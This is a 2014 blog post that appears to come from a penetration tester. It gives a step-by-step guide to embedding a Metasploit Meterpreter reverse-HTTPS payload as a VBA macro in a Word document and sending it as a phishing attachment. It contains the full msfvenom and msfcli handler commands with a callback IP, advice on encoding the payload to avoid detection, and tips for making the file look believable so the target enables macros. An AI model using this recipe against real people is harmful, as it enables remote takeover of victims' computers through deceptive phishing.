Friday 15 August 2014

Metasploit - Meterpreter Inject Visual Basic Meterpreter Shell into Word File

Hi All,

Hope everyone is doing well.  This little post will show you how to inject meterpreter shell to a Word document.  So the reason why I decided to create this post was due to a pentest that I was performing.  I was looking through the website and there was nothing to go by, brute force of the admin page was blocked after 5 invalid attempts.  User enumeration was blocked, nothing on haveibeenpwned for emails gathered.  But there was a registration form for an upcoming event. This file was a word document that once completed needed to be emailed to the mentioned email.  This is the perfect phishing target as the client is expecting the email with an attached word document so there is initial trust there. This was my attack vector and worked beautifully.  Here is my little guide.

  1. Open up your command line and execute the following command.

    msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.187.142 LPORT=443 -f vba > vbcode.vba 

    Where LHOST is your IP that the client will connect back to. For this example I did not use any of the encoders but it is recommended to do so. My favourite is x86/shikata_ga_nai and can be added by doing the following '-e x86/shikata_ga_nai -i 5' where '-i' means how many iterations to go through of encoding.
  2. Copy the exported file to a location you can remember 
  3. Open up the word document and press 'ALT + F11'.  This will open up the visual basic editor.
  4.  Right Click 'ThisDocument' and click import file.
 

5. If you cant see the file select all files as shown.
 

6. You will now have the module in the modules list as shown.  Access the module by double clicking.
7. Save the document as '97/2003' format to whatever name you like.  Keeping the original name makes it more believable.
8. Now go back to the console where you will run metasploit from and execute the below command.
msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=192.168.187.142 LPORT=443 E 

Where LHOST is your IP that the client will connect back to.

A note from this, you can create the handler in msfconsole if you wish to but this fast tracks the process.




9. Wait for user to open file.....  But I will do it myself as this is a test ;-P.
10. On the client depending on their macro settings there will be a message as shown. For this to work they need to click the enable content.  Note this test was actioned on Word 2013
11. Then meterpreter session starts.

 

 12.Party Time

Posted by at No comments:
Subscribe to: Posts (Atom)